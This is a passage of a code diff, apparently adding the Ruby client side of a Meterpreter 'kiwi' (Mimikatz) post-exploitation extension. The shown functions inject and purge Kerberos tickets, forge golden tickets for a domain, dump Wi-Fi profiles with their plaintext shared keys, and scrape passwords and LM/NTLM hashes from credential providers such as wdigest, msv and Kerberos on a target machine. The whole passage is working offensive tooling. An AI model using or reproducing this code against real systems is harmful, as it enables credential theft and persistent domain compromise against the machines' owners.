+ :client => t.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_CLIENTNAME),
173
+ :client_realm => t.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_CLIENTREALM),
174
+ :flags => t.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_FLAGS),
175
+ :raw => t.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_RAW)
176
+ }
177
+ end
178
+
179
+ results
180
+ end
181
+
182
+ #
183
+ # Use the given ticket in the current session.
184
+ #
185
+ # @param ticket [String] Content of the Kerberos ticket to use.
186
+ #
187
+ # @return [void]
188
+ #
189
+ def kerberos_ticket_use(ticket)
190
+ request = Packet.create_request('kiwi_kerberos_ticket_use')
191
+ request.add_tlv(TLV_TYPE_KIWI_KERB_TKT_RAW, ticket, false, true)
192
+ client.send_request(request)
193
+ return true
194
+ end
195
+
196
+ #
197
+ # Purge any Kerberos tickets that have been added to the current session.
198
+ #
199
+ # @return [void]
200
+ #
201
+ def kerberos_ticket_purge
202
+ request = Packet.create_request('kiwi_kerberos_ticket_purge')
203
+ client.send_request(request)
204
+ return true
205
+ end
206
+
207
+ #
208
+ # Create a new golden kerberos ticket on the target machine and return it.
209
+ #
210
+ # @param user [String] Name of the user to create the ticket for.
211
+ # @param domain [String] Domain name.
212
+ # @param sid [String] SID of the domain.
213
+ # @param tgt [String] The kerberos ticket granting token.
214
+ # @param id [Fixnum] ID of the user to grant the token for.
215
+ # @param group_ids [Array<Fixnum>] IDs of the groups to assign to the user
216
+ #
217
+ # @return [String]
218
+ #
219
+ def golden_ticket_create(user, domain, sid, tgt, id = 0, group_ids = [])
220
+ request = Packet.create_request('kiwi_kerberos_golden_ticket_create')
221
+ request.add_tlv(TLV_TYPE_KIWI_GOLD_USER, user)
222
+ request.add_tlv(TLV_TYPE_KIWI_GOLD_DOMAIN, domain)
223
+ request.add_tlv(TLV_TYPE_KIWI_GOLD_SID, sid)
224
+ request.add_tlv(TLV_TYPE_KIWI_GOLD_TGT, tgt)
225
+ request.add_tlv(TLV_TYPE_KIWI_GOLD_USERID, id)
226
+
227
+ group_ids.each do |g|
228
+ request.add_tlv(TLV_TYPE_KIWI_GOLD_GROUPID, g)
229
+ end
230
+
231
+ response = client.send_request(request)
232
+ return response.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_RAW)
233
+ end
234
+
235
+ #
236
+ # List all the wifi interfaces and the profiles associated
237
+ # with them. Also show the raw text passwords for each.
238
+ #
239
+ # @return [Array<Hash>]
240
+ def wifi_list
241
+ request = Packet.create_request('kiwi_wifi_profile_list')
242
+
243
+ response = client.send_request(request)
244
+
245
+ results = []
246
+
247
+ response.each(TLV_TYPE_KIWI_WIFI_INT) do |i|
248
+ interface = {
249
+ :guid => Rex::Text::to_guid(i.get_tlv_value(TLV_TYPE_KIWI_WIFI_INT_GUID)),
250
+ :desc => i.get_tlv_value(TLV_TYPE_KIWI_WIFI_INT_DESC),
251
+ :state => i.get_tlv_value(TLV_TYPE_KIWI_WIFI_INT_STATE),
252
+ :profiles => []
253
+ }
254
+
255
+ i.each(TLV_TYPE_KIWI_WIFI_PROFILE) do |p|
256
+
257
+ xml = p.get_tlv_value(TLV_TYPE_KIWI_WIFI_PROFILE_XML)
258
+ doc = REXML::Document.new(xml)
259
+ profile = doc.elements['WLANProfile']
260
+
261
+ interface[:profiles] << {
262
+ :name => p.get_tlv_value(TLV_TYPE_KIWI_WIFI_PROFILE_NAME),
263
+ :auth => profile.elements['MSM/security/authEncryption/authentication'].text,
264
+ :key_type => profile.elements['MSM/security/sharedKey/keyType'].text,
265
+ :shared_key => profile.elements['MSM/security/sharedKey/keyMaterial'].text
266
+ }
267
+ end
268
+
269
+ results << interface
270
+ end
271
+
272
+ return results
273
+ end
274
+
275
+ #
276
+ # Scrape passwords from the target machine.
277
+ #
278
+ # @param pwd_id [Fixnum] ID of the type credential to scrape.
279
+ #
280
+ # @return [Array<Hash>]
281
+ def scrape_passwords(pwd_id)
282
+ request = Packet.create_request('kiwi_scrape_passwords')
283
+ request.add_tlv(TLV_TYPE_KIWI_PWD_ID, pwd_id)
284
+ response = client.send_request(request)
285
+
286
+ results = []
287
+ response.each(TLV_TYPE_KIWI_PWD_RESULT) do |r|
288
+ results << {
289
+ :username => r.get_tlv_value(TLV_TYPE_KIWI_PWD_USERNAME),
290
+ :domain => r.get_tlv_value(TLV_TYPE_KIWI_PWD_DOMAIN),
291
+ :password => r.get_tlv_value(TLV_TYPE_KIWI_PWD_PASSWORD),
292
+ :auth_hi => r.get_tlv_value(TLV_TYPE_KIWI_PWD_AUTH_HI),
293
+ :auth_lo => r.get_tlv_value(TLV_TYPE_KIWI_PWD_AUTH_LO),
294
+ :lm => r.get_tlv_value(TLV_TYPE_KIWI_PWD_LMHASH),
295
+ :ntlm => r.get_tlv_value(TLV_TYPE_KIWI_PWD_NTLMHASH)
296
+ }
297
+ end
298
+
299
+ return results
300
+ end
301
+
302
+ #
303
+ # Scrape all passwords from the target machine.
304
+ #
305
+ # @return (see #scrape_passwords)
306
+ def all_pass
307
+ scrape_passwords(PWD_ID_SEK_ALLPASS)
308
+ end
309
+
310
+ #
311
+ # Scrape wdigest credentials from the target machine.
312
+ #
313
+ # @return (see #scrape_passwords)
314
+ def wdigest
315
+ scrape_passwords(PWD_ID_SEK_WDIGEST)
316
+ end
317
+
318
+ #
319
+ # Scrape msv credentials from the target machine.
320
+ #
321
+ # @return (see #scrape_passwords)
322
+ def msv
323
+ scrape_passwords(PWD_ID_SEK_MSV)
324
+ end
325
+
326
+ #
327
+ # Scrape LiveSSP credentials from the target machine.
328
+ #
329
+ # @return (see #scrape_passwords)
330
+ def livessp
331
+ scrape_passwords(PWD_ID_SEK_LIVESSP)
332
+ end
333
+
334
+ #
335
+ # Scrape SSP credentials from the target machine.
336
+ #
337
+ # @return (see #scrape_passwords)
338
+ def ssp
339
+ scrape_passwords(PWD_ID_SEK_SSP)
340
+ end
341
+
342
+ #
343
+ # Scrape TSPKG credentials from the target machine.
344
+ #
345
+ # @return (see #scrape_passwords)
346
+ def tspkg
347
+ scrape_passwords(PWD_ID_SEK_TSPKG)
348
+ end
349
+
350
+ #
351
+ # Scrape Kerberos credentials from the target machine.
352
+ #
353
+ # @return (see #scrape_passwords)
354
+ def kerberos
355
+ scrape_passwords(PWD_ID_SEK_KERBEROS)
356
+ end
357
+
358
+ end
359
+
360
+ end; end; end; end; end
361
+